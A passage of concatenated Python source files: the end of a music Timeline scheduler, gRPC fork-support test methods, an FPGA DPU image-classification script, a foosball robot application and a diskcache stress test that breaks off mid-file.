# Copy self.events because removing from it whilst using it = bad idea.
# Perform events before tracks are executed because an event might
# include scheduling a quantized track, which should then be
# immediately evaluated.
#--------------------------------------------------------------------------------
for event in self.events[:]:
#--------------------------------------------------------------------------------
# The only event we currently get in a Timeline are add_track events
# -- which have a function object associated with them.
#
# Round to work around rounding errors.
# http://docs.python.org/tutorial/floatingpoint.html
#--------------------------------------------------------------------------------
if round(event[EVENT_TIME], 8) <= round(self.current_time, 8):
event[EVENT_ACTION]()
self.events.remove(event)
#--------------------------------------------------------------------------------
# Copy self.tracks because removing from it whilst using it = bad idea
#--------------------------------------------------------------------------------
for track in self.tracks[:]:
try:
track.tick()
except Exception as e:
if self.ignore_exceptions:
print("*** Exception in track: %s" % e)
else:
raise
if track.is_finished and track.remove_when_done:
self.tracks.remove(track)
log.info("Timeline: Track finished, removing from scheduler (total tracks: %d)" % len(self.tracks))
#--------------------------------------------------------------------------------
# If we've run out of notes, raise a StopIteration.
#--------------------------------------------------------------------------------
if len(self.tracks) == 0 and len(self.events) == 0 and self.stop_when_done:
# TODO: Don't do this if we've never played any events, e.g.
# right after calling timeline.background(). Should at least
# wait for some events to happen first.
raise StopIteration
#--------------------------------------------------------------------------------
# Tell our output devices to move forward a step.
#--------------------------------------------------------------------------------
for device in self.output_devices:
clock_multiplier = self.clock_multipliers[device]
ticks = next(clock_multiplier)
for tick in range(ticks):
device.tick()
#--------------------------------------------------------------------------------
# Increment beat count according to our current tick_length.
#--------------------------------------------------------------------------------
self.current_time += self.tick_duration
def dump(self):
""" Output a summary of this Timeline object
"""
print("Timeline (clock: %s, tempo %s)" %
(self.clock_source, self.clock_source.tempo if self.clock_source.tempo else "unknown"))
print((" - %d devices" % len(self.output_devices)))
for device in self.output_devices:
print((" - %s" % device))
print((" - %d tracks" % len(self.tracks)))
for tracks in self.tracks:
print((" - %s" % tracks))
def reset_to_beat(self):
""" Reset the timer to the last beat.
Useful when a MIDI Stop/Reset message is received. """
self.current_time = round(self.current_time)
for tracks in self.tracks:
tracks.reset_to_beat()
def reset(self):
""" Reset the timeline to t = 0. """
self.current_time = 0.0
for track in self.tracks:
track.reset()
def background(self):
""" Run this Timeline in a background thread. """
self.thread = threading.Thread(target=self.run)
self.thread.setDaemon(True)
self.thread.start()
def run(self, stop_when_done=None, background=False):
""" Run this Timeline in the foreground.
If stop_when_done is set, returns when no tracks are currently
scheduled; otherwise, keeps running indefinitely. """
if stop_when_done and background:
raise Exception("Can't select both stop_when_done and background")
self.start()
if stop_when_done is not None:
self.stop_when_done = stop_when_done
try:
#--------------------------------------------------------------------------------
# Start the clock. This might internal (eg a Clock object, running on
# an independent thread), or external (eg a MIDI clock).
#--------------------------------------------------------------------------------
for device in self.output_devices:
device.start()
self.running = True
self.clock_source.run()
except StopIteration:
#--------------------------------------------------------------------------------
# This will be hit if every Pattern in a timeline is exhausted.
#--------------------------------------------------------------------------------
log.info("Timeline: Finished")
self.running = False
except Exception as e:
print((" *** Exception in Timeline thread: %s" % e))
if not self.ignore_exceptions:
raise e
def start(self):
log.info("Timeline: Starting")
def stop(self):
log.info("Timeline: Stopping")
for device in self.output_devices:
device.all_notes_off()
device.stop()
self.clock_source.stop()
def warp(self, warper):
""" Apply a PWarp object to warp our clock's timing. """
self.clock_source.warp(warper)
def unwarp(self, warper):
""" Remove a PWarp object from our clock. """
self.clock_source.warp(warper)
def get_output_device(self):
if len(self.output_devices) != 1:
raise Exception("output_device is ambiguous for Timelines with multiple outputs")
return self.output_devices[0]
def set_output_device(self, output_device):
""" Set a new device to send events to, removing any existing outputs. """
self.output_devices = []
self.add_output_device(output_device)
output_device = property(get_output_device, set_output_device)
def add_output_device(self, output_device):
""" Append a new output device to our output list. """
self.output_devices.append(output_device)
self.clock_multipliers[output_device] = make_clock_multiplier(output_device.ticks_per_beat, self.ticks_per_beat)
def schedule(self,
params=None,
quantize=None,
delay=0,
count=None,
interpolate=INTERPOLATION_NONE,
output_device=None,
remove_when_done=True):
"""
Schedule a new track within this Timeline.
Args:
params (dict): Event dictionary. Keys are generally EVENT_* values, defined in constants.py.
If params is None, a new empty Track will be scheduled and returned.
This can be updated with Track.update() to begin generating events.
params can alternatively be a Pattern that generates a dict output.
quantize (float): Quantize level, in beats. For example, 1.0 will begin executing the
events on the next whole beats.
delay (float): Delay time, in beats, before events should be executed.
If `quantize` and `delay` are both specified, quantization is applied,
and the event is scheduled `delay` beats after the quantization time.
count (int): Number of events to process, or unlimited if not specified.
interpolate (int): Interpolation mode for control segments.
output_device: Output device to send events to. Uses the Timeline default if not specified.
remove_when_done (bool): If True, removes the Track from the Timeline when it is finished.
Otherwise, retains the Track, so update() can later be called to schedule
additional events on it.
Returns:
The new `Track` object.
Raises:
TrackLimitReachedException: If `max_tracks` has been reached.
"""
if not output_device:
#--------------------------------------------------------------------------------
# If no output device exists, send to the system default MIDI output.
#--------------------------------------------------------------------------------
if not self.output_devices:
self.add_output_device(MidiOutputDevice())
output_device = self.output_devices[0]
if self.max_tracks and len(self.tracks) >= self.max_tracks:
raise TrackLimitReachedException("Timeline: Refusing to schedule track (hit limit of %d)" % self.max_tracks)
def start_track(track):
#--------------------------------------------------------------------------------
# Add a new track.
#--------------------------------------------------------------------------------
self.tracks.append(track)
log.info("Timeline: Scheduled new track (total tracks: %d)" % len(self.tracks))
if isinstance(params, Track):
track = params
track.reset()
else:
#--------------------------------------------------------------------------------
# Take a copy of params to avoid modifying the original
#--------------------------------------------------------------------------------
track = Track(self, copy.copy(params), max_event_count=count, interpolate=interpolate,
output_device=output_device, remove_when_done=remove_when_done)
if quantize is None:
quantize = self.defaults.quantize
if quantize or delay:
#--------------------------------------------------------------------------------
# We don't want to begin events right away -- either wait till
# the next beat boundary (quantize), or delay a number of beats.
#--------------------------------------------------------------------------------
scheduled_time = self.current_time
if quantize:
scheduled_time = quantize * math.ceil(float(self.current_time) / quantize)
scheduled_time += delay
self.events.append({
EVENT_TIME: scheduled_time,
EVENT_ACTION: lambda: start_track(track)
})
else:
#--------------------------------------------------------------------------------
# Begin events on this track right away.
#--------------------------------------------------------------------------------
start_track(track)
return track
#--------------------------------------------------------------------------------
# Backwards-compatibility
#--------------------------------------------------------------------------------
sched = schedule
def unschedule(self, track):
if track not in self.tracks:
raise TrackNotFoundException("Track is not currently scheduled")
self.tracks.remove(track)
def clear(self):
for track in self.tracks[:]:
self.unschedule(track)
|
methods.py
|
# Copyright 2018 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implementations of fork support test methods."""
import enum
import json
import logging
import multiprocessing
import os
import threading
import time
import grpc
from six.moves import queue
from src.proto.grpc.testing import empty_pb2
from src.proto.grpc.testing import messages_pb2
from src.proto.grpc.testing import test_pb2_grpc
_LOGGER = logging.getLogger(__name__)
def _channel(args):
target = '{}:{}'.format(args.server_host, args.server_port)
if args.use_tls:
channel_credentials = grpc.ssl_channel_credentials()
channel = grpc.secure_channel(target, channel_credentials)
else:
channel = grpc.insecure_channel(target)
return channel
def _validate_payload_type_and_length(response, expected_type, expected_length):
if response.payload.type is not expected_type:
raise ValueError('expected payload type %s, got %s' %
(expected_type, type(response.payload.type)))
elif len(response.payload.body) != expected_length:
raise ValueError('expected payload body size %d, got %d' %
(expected_length, len(response.payload.body)))
def _async_unary(stub):
size = 314159
request = messages_pb2.SimpleRequest(
response_type=messages_pb2.COMPRESSABLE,
response_size=size,
payload=messages_pb2.Payload(body=b'\x00' * 271828))
response_future = stub.UnaryCall.future(request)
response = response_future.result()
_validate_payload_type_and_length(response, messages_pb2.COMPRESSABLE, size)
def _blocking_unary(stub):
size = 314159
request = messages_pb2.SimpleRequest(
response_type=messages_pb2.COMPRESSABLE,
response_size=size,
payload=messages_pb2.Payload(body=b'\x00' * 271828))
response = stub.UnaryCall(request)
_validate_payload_type_and_length(response, messages_pb2.COMPRESSABLE, size)
class _Pipe(object):
def __init__(self):
self._condition = threading.Condition()
self._values = []
self._open = True
def __iter__(self):
return self
def __next__(self):
return self.next()
def next(self):
with self._condition:
while not self._values and self._open:
self._condition.wait()
if self._values:
return self._values.pop(0)
else:
raise StopIteration()
def add(self, value):
with self._condition:
self._values.append(value)
self._condition.notify()
def close(self):
with self._condition:
self._open = False
self._condition.notify()
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
class _ChildProcess(object):
def __init__(self, task, args=None):
if args is None:
args = ()
self._exceptions = multiprocessing.Queue()
def record_exceptions():
try:
task(*args)
except Exception as e: # pylint: disable=broad-except
self._exceptions.put(e)
self._process = multiprocessing.Process(target=record_exceptions)
def start(self):
self._process.start()
def finish(self):
self._process.join()
if self._process.exitcode != 0:
raise ValueError('Child process failed with exitcode %d' %
self._process.exitcode)
try:
exception = self._exceptions.get(block=False)
raise ValueError('Child process failed: %s' % exception)
except queue.Empty:
pass
def _async_unary_same_channel(channel):
def child_target():
try:
_async_unary(stub)
raise Exception(
'Child should not be able to re-use channel after fork')
except ValueError as expected_value_error:
pass
stub = test_pb2_grpc.TestServiceStub(channel)
_async_unary(stub)
child_process = _ChildProcess(child_target)
child_process.start()
_async_unary(stub)
child_process.finish()
def _async_unary_new_channel(channel, args):
def child_target():
child_channel = _channel(args)
child_stub = test_pb2_grpc.TestServiceStub(child_channel)
_async_unary(child_stub)
child_channel.close()
stub = test_pb2_grpc.TestServiceStub(channel)
_async_unary(stub)
child_process = _ChildProcess(child_target)
child_process.start()
_async_unary(stub)
child_process.finish()
def _blocking_unary_same_channel(channel):
def child_target():
try:
_blocking_unary(stub)
raise Exception(
'Child should not be able to re-use channel after fork')
except ValueError as expected_value_error:
pass
stub = test_pb2_grpc.TestServiceStub(channel)
_blocking_unary(stub)
child_process = _ChildProcess(child_target)
child_process.start()
child_process.finish()
def _blocking_unary_new_channel(channel, args):
def child_target():
child_channel = _channel(args)
child_stub = test_pb2_grpc.TestServiceStub(child_channel)
_blocking_unary(child_stub)
child_channel.close()
stub = test_pb2_grpc.TestServiceStub(channel)
_blocking_unary(stub)
child_process = _ChildProcess(child_target)
child_process.start()
_blocking_unary(stub)
child_process.finish()
# Verify that the fork channel registry can handle already closed channels
def _close_channel_before_fork(channel, args):
def child_target():
new_channel.close()
child_channel = _channel(args)
child_stub = test_pb2_grpc.TestServiceStub(child_channel)
_blocking_unary(child_stub)
child_channel.close()
stub = test_pb2_grpc.TestServiceStub(channel)
_blocking_unary(stub)
channel.close()
new_channel = _channel(args)
new_stub = test_pb2_grpc.TestServiceStub(new_channel)
child_process = _ChildProcess(child_target)
child_process.start()
_blocking_unary(new_stub)
child_process.finish()
def _connectivity_watch(channel, args):
def child_target():
def child_connectivity_callback(state):
child_states.append(state)
child_states = []
child_channel = _channel(args)
child_stub = test_pb2_grpc.TestServiceStub(child_channel)
child_channel.subscribe(child_connectivity_callback)
_async_unary(child_stub)
if len(child_states
) < 2 or child_states[-1] != grpc.ChannelConnectivity.READY:
raise ValueError('Channel did not move to READY')
if len(parent_states) > 1:
raise ValueError('Received connectivity updates on parent callback')
child_channel.unsubscribe(child_connectivity_callback)
child_channel.close()
def parent_connectivity_callback(state):
parent_states.append(state)
parent_states = []
channel.subscribe(parent_connectivity_callback)
stub = test_pb2_grpc.TestServiceStub(channel)
child_process = _ChildProcess(child_target)
child_process.start()
_async_unary(stub)
if len(parent_states
) < 2 or parent_states[-1] != grpc.ChannelConnectivity.READY:
raise ValueError('Channel did not move to READY')
channel.unsubscribe(parent_connectivity_callback)
child_process.finish()
# Need to unsubscribe or _channel.py in _poll_connectivity triggers a
# "Cannot invoke RPC on closed channel!" error.
# TODO(ericgribkoff) Fix issue with channel.close() and connectivity polling
channel.unsubscribe(parent_connectivity_callback)
def _ping_pong_with_child_processes_after_first_response(
channel, args, child_target, run_after_close=True):
request_response_sizes = (
31415,
9,
2653,
58979,
)
request_payload_sizes = (
27182,
8,
1828,
45904,
)
stub = test_pb2_grpc.TestServiceStub(channel)
pipe = _Pipe()
parent_bidi_call = stub.FullDuplexCall(pipe)
child_processes = []
first_message_received = False
for response_size, payload_size in zip(request_response_sizes,
request_payload_sizes):
request = messages_pb2.StreamingOutputCallRequest(
response_type=messages_pb2.COMPRESSABLE,
response_parameters=(
messages_pb2.ResponseParameters(size=response_size),),
payload=messages_pb2.Payload(body=b'\x00' * payload_size))
pipe.add(request)
if first_message_received:
child_process = _ChildProcess(child_target,
(parent_bidi_call, channel, args))
child_process.start()
child_processes.append(child_process)
response = next(parent_bidi_call)
first_message_received = True
child_process = _ChildProcess(child_target,
(parent_bidi_call, channel, args))
child_process.start()
child_processes.append(child_process)
_validate_payload_type_and_length(response, messages_pb2.COMPRESSABLE,
response_size)
pipe.close()
if run_after_close:
child_process = _ChildProcess(child_target,
(parent_bidi_call, channel, args))
child_process.start()
child_processes.append(child_process)
for child_process in child_processes:
child_process.finish()
def _in_progress_bidi_continue_call(channel):
def child_target(parent_bidi_call, parent_channel, args):
stub = test_pb2_grpc.TestServiceStub(parent_channel)
try:
_async_unary(stub)
raise Exception(
'Child should not be able to re-use channel after fork')
except ValueError as expected_value_error:
pass
inherited_code = parent_bidi_call.code()
inherited_details = parent_bidi_call.details()
if inherited_code != grpc.StatusCode.CANCELLED:
raise ValueError(
'Expected inherited code CANCELLED, got %s' % inherited_code)
if inherited_details != 'Channel closed due to fork':
raise ValueError(
'Expected inherited details Channel closed due to fork, got %s'
% inherited_details)
# Don't run child_target after closing the parent call, as the call may have
# received a status from the server before fork occurs.
_ping_pong_with_child_processes_after_first_response(
channel, None, child_target, run_after_close=False)
def _in_progress_bidi_same_channel_async_call(channel):
def child_target(parent_bidi_call, parent_channel, args):
stub = test_pb2_grpc.TestServiceStub(parent_channel)
try:
_async_unary(stub)
raise Exception(
'Child should not be able to re-use channel after fork')
except ValueError as expected_value_error:
pass
_ping_pong_with_child_processes_after_first_response(
channel, None, child_target)
def _in_progress_bidi_same_channel_blocking_call(channel):
def child_target(parent_bidi_call, parent_channel, args):
stub = test_pb2_grpc.TestServiceStub(parent_channel)
try:
_blocking_unary(stub)
raise Exception(
'Child should not be able to re-use channel after fork')
except ValueError as expected_value_error:
pass
_ping_pong_with_child_processes_after_first_response(
channel, None, child_target)
def _in_progress_bidi_new_channel_async_call(channel, args):
def child_target(parent_bidi_call, parent_channel, args):
channel = _channel(args)
stub = test_pb2_grpc.TestServiceStub(channel)
_async_unary(stub)
_ping_pong_with_child_processes_after_first_response(
channel, args, child_target)
def _in_progress_bidi_new_channel_blocking_call(channel, args):
def child_target(parent_bidi_call, parent_channel, args):
channel = _channel(args)
stub = test_pb2_grpc.TestServiceStub(channel)
_blocking_unary(stub)
_ping_pong_with_child_processes_after_first_response(
channel, args, child_target)
@enum.unique
class TestCase(enum.Enum):
CONNECTIVITY_WATCH = 'connectivity_watch'
CLOSE_CHANNEL_BEFORE_FORK = 'close_channel_before_fork'
ASYNC_UNARY_SAME_CHANNEL = 'async_unary_same_channel'
ASYNC_UNARY_NEW_CHANNEL = 'async_unary_new_channel'
BLOCKING_UNARY_SAME_CHANNEL = 'blocking_unary_same_channel'
BLOCKING_UNARY_NEW_CHANNEL = 'blocking_unary_new_channel'
IN_PROGRESS_BIDI_CONTINUE_CALL = 'in_progress_bidi_continue_call'
IN_PROGRESS_BIDI_SAME_CHANNEL_ASYNC_CALL = 'in_progress_bidi_same_channel_async_call'
IN_PROGRESS_BIDI_SAME_CHANNEL_BLOCKING_CALL = 'in_progress_bidi_same_channel_blocking_call'
IN_PROGRESS_BIDI_NEW_CHANNEL_ASYNC_CALL = 'in_progress_bidi_new_channel_async_call'
IN_PROGRESS_BIDI_NEW_CHANNEL_BLOCKING_CALL = 'in_progress_bidi_new_channel_blocking_call'
def run_test(self, args):
_LOGGER.info("Running %s", self)
channel = _channel(args)
if self is TestCase.ASYNC_UNARY_SAME_CHANNEL:
_async_unary_same_channel(channel)
elif self is TestCase.ASYNC_UNARY_NEW_CHANNEL:
_async_unary_new_channel(channel, args)
elif self is TestCase.BLOCKING_UNARY_SAME_CHANNEL:
_blocking_unary_same_channel(channel)
elif self is TestCase.BLOCKING_UNARY_NEW_CHANNEL:
_blocking_unary_new_channel(channel, args)
elif self is TestCase.CLOSE_CHANNEL_BEFORE_FORK:
_close_channel_before_fork(channel, args)
elif self is TestCase.CONNECTIVITY_WATCH:
_connectivity_watch(channel, args)
elif self is TestCase.IN_PROGRESS_BIDI_CONTINUE_CALL:
_in_progress_bidi_continue_call(channel)
elif self is TestCase.IN_PROGRESS_BIDI_SAME_CHANNEL_ASYNC_CALL:
_in_progress_bidi_same_channel_async_call(channel)
elif self is TestCase.IN_PROGRESS_BIDI_SAME_CHANNEL_BLOCKING_CALL:
_in_progress_bidi_same_channel_blocking_call(channel)
elif self is TestCase.IN_PROGRESS_BIDI_NEW_CHANNEL_ASYNC_CALL:
_in_progress_bidi_new_channel_async_call(channel, args)
elif self is TestCase.IN_PROGRESS_BIDI_NEW_CHANNEL_BLOCKING_CALL:
_in_progress_bidi_new_channel_blocking_call(channel, args)
else:
raise NotImplementedError(
'Test case "%s" not implemented!' % self.name)
channel.close()
|
app_mt_aidea.py
|
# Copyright 2021 Industrial Technology Research Institute
#
# Copyright 2020 Xilinx Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# NOTICE: This file has been modified by Industrial Technology Research Institute for AIdea "FPGA Edge AI – AOI Defect
# Classification" competition
from ctypes import *
from typing import List
import cv2
import numpy as np
import vart
import os
import pathlib
import xir
import threading
import time
import sys
import argparse
divider = '------------------------------------'
def preprocess_fn(image_path):
'''
Image pre-processing.
Rearranges from BGR to RGB then normalizes to range 0:1
input arg: path of image file
return: numpy array
'''
image = cv2.imread(image_path)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = image / 255.0
return image
def get_child_subgraph_dpu(graph: "Graph") -> List["Subgraph"]:
assert graph is not None, "'graph' should not be None."
root_subgraph = graph.get_root_subgraph()
assert (root_subgraph is not None), "Failed to get root subgraph of input Graph object."
if root_subgraph.is_leaf:
return []
child_subgraphs = root_subgraph.toposort_child_subgraph()
assert child_subgraphs is not None and len(child_subgraphs) > 0
return [
cs
for cs in child_subgraphs
if cs.has_attr("device") and cs.get_attr("device").upper() == "DPU"
]
def runDPU(id, start, dpu, img):
'''get tensor'''
inputTensors = dpu.get_input_tensors()
outputTensors = dpu.get_output_tensors()
input_ndim = tuple(inputTensors[0].dims)
output_ndim = tuple(outputTensors[0].dims)
batchSize = input_ndim[0]
n_of_images = len(img)
count = 0
write_index = start
while count < n_of_images:
if count + batchSize <= n_of_images:
runSize = batchSize
else:
runSize = n_of_images - count
'''prepare batch input/output '''
outputData = []
inputData = []
inputData = [np.empty(input_ndim, dtype=np.float32, order="C")]
outputData = [np.empty(output_ndim, dtype=np.float32, order="C")]
'''init input image to input buffer '''
for j in range(runSize):
imageRun = inputData[0]
imageRun[j, ...] = img[(count + j) % n_of_images].reshape(input_ndim[1:])
'''run with batch '''
job_id = dpu.execute_async(inputData, outputData)
dpu.wait(job_id)
'''store output vectors '''
for j in range(runSize):
out_q[write_index] = np.argmax((outputData[0][j]))
write_index += 1
count = count + runSize
def app(image_dir, threads, model):
listimage = sorted(os.listdir(image_dir))
runTotal = len(listimage)
global out_q
out_q = [None] * runTotal
g = xir.Graph.deserialize(model)
subgraphs = get_child_subgraph_dpu(g)
all_dpu_runners = []
for i in range(threads):
all_dpu_runners.append(vart.Runner.create_runner(subgraphs[0], "run"))
''' preprocess images '''
print(divider)
print('Pre-processing', runTotal, 'images...')
img = []
for i in range(runTotal):
path = os.path.join(image_dir, listimage[i])
img.append(preprocess_fn(path))
'''run threads '''
print('Starting', threads, 'threads...')
threadAll = []
start = 0
for i in range(threads):
if (i == threads - 1):
end = len(img)
else:
end = start + (len(img) // threads)
in_q = img[start:end]
t1 = threading.Thread(target=runDPU, args=(i, start, all_dpu_runners[i], in_q))
threadAll.append(t1)
start = end
time1 = time.time()
for x in threadAll:
x.start()
for x in threadAll:
x.join()
time2 = time.time()
timetotal = time2 - time1
fps = float(runTotal / timetotal)
print(divider)
print("Throughput=%.2f fps, total frames = %.0f, time=%.4f seconds" % (fps, runTotal, timetotal))
''' post-processing '''
classes = ['0', '1', '2', '3', '4', '5']
print('Post-processing', len(out_q), 'images..')
with open('/output/result.csv', 'w') as f:
f.write(f'ID,Label\n')
for i in range(len(out_q)):
prediction = classes[out_q[i]]
f.write(f'{listimage[i]},{prediction}\n')
print(divider)
with open('/output/time_info.txt', 'w') as f:
f.write(f'FPS = {fps}\n')
# only used if script is run as 'main' from command line
def main():
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument('-d', '--image_dir', type=str, default='images', help='Path to folder of images. Default is images')
ap.add_argument('-t', '--threads', type=int, default=1, help='Number of threads. Default is 1')
ap.add_argument('-m', '--model', type=str, default='customcnn.xmodel',
help='Path of xmodel. Default is customcnn.xmodel')
args = ap.parse_args()
print(divider)
print('Command line options:')
print(' --image_dir : ', args.image_dir)
print(' --threads : ', args.threads)
print(' --model : ', args.model)
app(args.image_dir, args.threads, args.model)
if __name__ == '__main__':
main()
|
Application.py
|
#!/usr/bin/env python
import cv2
import logging
import pygame
import numpy as np
from multiprocessing import Process, Queue
import sys
import os
import tensorflow as tf
import yaml
from kicker.agents.neural_net_agent import NeuralNetAgent
from kicker.opcua_motor import MotorController
from kicker import ConsoleView, Helper
from kicker.agents import KeyboardAgent, RandomAgent
from kicker.storage import Storage, storage_worker
from kicker.image import add_ball, Analyzer
pygame.init()
pygame.font.init()
logging.basicConfig(filename='kicker.log', level=logging.DEBUG,
format='%(asctime)s %(filename)s %(lineno)d %(levelname)s %(message)s')
logging.info("Fussball ist wie Schach nur ohne Wuerfel")
import keras.backend.tensorflow_backend as KTF
def get_session(gpu_fraction=0.4):
num_threads = os.environ.get('OMP_NUM_THREADS')
gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=gpu_fraction)
if num_threads:
return tf.Session(config=tf.ConfigProto(
gpu_options=gpu_options, intra_op_parallelism_threads=num_threads))
else:
return tf.Session(config=tf.ConfigProto(gpu_options=gpu_options))
def set_keras_gpu_use(percentage):
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
KTF.set_session(sess)
set_keras_gpu_use(0.4)
def read_config():
with open('config.yml', 'r') as f:
return yaml.load(f)
class Application(object):
def __init__(self, agent, enable_storage=True):
self.screen = None
self.screen_width = 640
self.screen_height = 480
self.screen_width = 1024
self.screen_height = 800
self.view = ConsoleView()
self.video = cv2.VideoCapture(1)
self.inputs = [0, ] * 8
self.agent = agent
self.config = read_config()
self.motor = MotorController()
self.helper = Helper()
self.enable_storage = enable_storage
if self.enable_storage:
self.storage_queue = Queue()
self.storage_process = Process(
target=storage_worker, args=(self.storage_queue, self.config))
self.storage_process.start()
self.analyzer = Analyzer(self.config)
def submit_inputs(self):
# cself.view.renderView(self.inputs)
self.motor.control(self.inputs)
def run(self):
self.screen = pygame.display.set_mode(
(self.screen_width, self.screen_height))
while True:
# logging.debug("Start event loop")
if self.video.grab():
r, f = self.video.retrieve()
# self.possible_moves = self.analyzer.get_possible_moves(f)
# img, c_x, c_y = add_ball(f[:])
img = f[:]
# img = self.analyzer.add_circles_to_limiters(img[:, :, ::-1])
img = self.analyzer.extract_table(
img, (self.screen_width, self.screen_height))
# img = cv2.resize(img, (self.screen_width, self.screen_height))
self.agent.new_frame(f)
if self.enable_storage:
self.storage_queue.put((f, self.inputs))
logging.debug("start updating window")
pygame.surfarray.blit_array(
self.screen, np.swapaxes(img[::-1, ::-1, ::-1], 0, 1))
# pygame.surfarray.blit_array(self.screen, img)
pygame.display.update()
# logging.debug("start processing events")
for event in pygame.event.get():
if event.type == pygame.QUIT:
# stop_all()
if self.enable_storage:
self.storage_queue.put((None, None))
self.storage_process.join()
self.motor.disconnect()
pygame.quit()
sys.exit()
self.agent.handle_event(event)
inputs = self.agent.get_inputs()
if inputs is not None:
# self.inputs = self.helper.handle_forbidden_moves(self.possible_moves, inputs)
self.inputs = inputs
self.submit_inputs()
if __name__ == '__main__':
# agent = RandomAgent()
# agent = KeyboardAgent()
agent = NeuralNetAgent()
program = Application(agent, enable_storage=False)
program.run()
|
stress_test_fanout.py
|
"Stress test diskcache.core.Cache."
from __future__ import print_function
import collections as co
from diskcache import FanoutCache, UnknownFileWarning, EmptyDirWarning
import multiprocessing as mp
import os
import random
import shutil
import sys
import threading
import time
import warnings
try:
import Queue
except ImportError:
import queue as Queue
if sys.hexversion < 0x03000000:
range = xrange
import cPickle as pickle
else:
import pickle
from .utils import display
OPERATIONS = int(1e4)
GET_AVERAGE = 100
KEY_COUNT = 10
DEL_CHANCE = 0.1
WARMUP = 10
EXPIRE = None
def make_keys():
def make_int():
return random.randrange(int(1e9))
def make_long():
value = random.randrange(int(1e9))
return value << 64
def make_unicode():
word_size = random.randint(1, 26)
word = u''.join(random.sample(u'abcdefghijklmnopqrstuvwxyz', word_size))
size = random.randint(1, int(200 / 13))
return word * size
def make_bytes():
word_size = random.randint(1, 26)
word = u''.join(random.sample(u'abcdefghijklmnopqrstuvwxyz', word_size)).encode('utf-8')
size = random.randint(1, int(200 / 13))
return word * size
def make_float():
return random.random()
def make_object():
return (make_float(),) * random.randint(1, 20)
funcs = [make_int, make_long, make_unicode, make_bytes, make_float, make_object]
while True:
func = random.choice(funcs)
yield func()
def make_vals():
def make_int():
return random.randrange(int(1e9))
def make_long():
value = random.randrange(int(1e9))
return value << 64
def make_unicode():
word_size = random.randint(1, 26)
word = u''.join(random.sample(u'abcdefghijklmnopqrstuvwxyz', word_size))
size = random.randint(1, int(2 ** 16 / 13))
return word * size
def make_bytes():
word_size = random.randint(1, 26)
word = u''.join(random.sample(u'abcdefghijklmnopqrstuvwxyz', word_size)).encode('utf-8')
size = random.randint(1, int(2 ** 16 / 13))
return word * size
def make_float():
return random.random()
def make_object():
return [make_float()] * random.randint(1, int(2e3))
funcs = [make_int, make_long, make_unicode, make_bytes, make_float, make_object]
while True:
func = random.choice(funcs)
yield func()
def key_ops():
keys = make_keys()
vals = make_vals()
key = next(keys)
while True:
value = next(vals)
yield 'set', key, value
for _ in range(int(random.expovariate(1.0 / GET_AVERAGE))):
yield 'get', key, value
if random.random() < DEL_CHANCE:
yield 'delete', key, None
def all_ops():
keys = [key_ops() for _ in range(KEY_COUNT)]
for _ in range(OPERATIONS):
ops = random.choice(keys)
yield next(ops)
def worker(queue, eviction_policy, processes, threads):
timings = {'get': [], 'set': [], 'delete': []}
cache = FanoutCache('tmp', eviction_policy=eviction_policy)
for index, (action, key, value) in enumerate(iter(queue.get, None)):
start = time.time()
if action == 'set':
cache.set(key, value, expire=EXPIRE)
elif action == 'get':
result = cache.get(key)
else:
assert action == 'delete'
cache.delete(key)
stop = time.time()
if action == 'get' and processes == 1 and threads == 1 and EXPIRE is None:
assert result == value
if index > WARMUP:
timings[action].append(stop - start)
queue.put(timings)
cache.close()
def dispatch(num, eviction_policy, processes, threads):
with open('input-%s.pkl' % num, 'rb') as reader:
process_queue = pickle.load(reader)
thread_queues = [Queue.Queue() for _ in range(threads)]
subthreads = [
threading.Thread(
target=worker, args=(thread_queue, eviction_policy, processes, threads)
) for thread_queue in thread_queues
]
for index, triplet in enumerate(process_queue):
thread_queue = thread_queues[index % threads]
thread_queue.put(triplet)
for thread_queue in thread_queues:
thread_queue.put(None)
start = time.time()
for thread in subthreads:
thread.start()
for thread in subthreads:
thread.join()
stop = time.time()
timings = {'get': [], 'set': [], 'delete': [], 'self': (stop - start)}
for thread_queue in thread_queues:
data = thread_queue.get()
for key in data:
timings[key].extend(data[key])
with open('output-%s.pkl' % num, 'wb') as writer:
pickle.dump(timings, writer, protocol=2)
def percentile(sequence, percent):
if not sequence:
return None
values = sorted(sequence)
if percent == 0:
return values[0]
pos = int(len(values) * percent) - 1
return values[pos]
def stress_test(create=True, delete=True,
eviction_policy=u'least-recently-stored',
processes=1, threads=1):
shutil.rmtree('tmp', ignore_errors=True)
if processes == 1:
# Use threads.
func = threading.Thread
else:
func = mp.Process
subprocs = [
func(target=dispatch, args=(num, eviction_policy, processes, threads))
for num in range(processes)
]
if create:
operations = list(all_ops())
process_queue = [[] for _ in range(processes)]
for index, ops in enumerate(operations):
process_queue[index % processes].append(ops)
for num in range(processes):
with open('input-%s.pkl' % num, 'wb') as writer:
pickle.dump(process_queue[num], writer, protocol=2)
for process in subprocs:
process.start()
for process in subprocs:
process.join()
with FanoutCache('tmp') as cache:
warnings.simplefilter('error')
warnings.simplefilter('ignore', category=UnknownFileWarning)
warnings.simplefilter('ignore', category=EmptyDirWarning)
cache.check()
timings = {'get': [], 'set': [], 'delete': [], 'self': 0.0}
for num in range(processes):
with open('output-%s.pkl' % num, 'rb') as reader:
data = pickle.load(reader)
for key in data:
timings[key] += data[key]
if delete:
for num in range(processes):
os.remove('input-%s.pkl' % num)
os.remove('output-%s.pkl' % num)
display(eviction_policy, timings)
shutil.rmtree('tmp', ignore_errors=True)
def stress_test_lru():
"Stress test least-recently-used eviction policy."
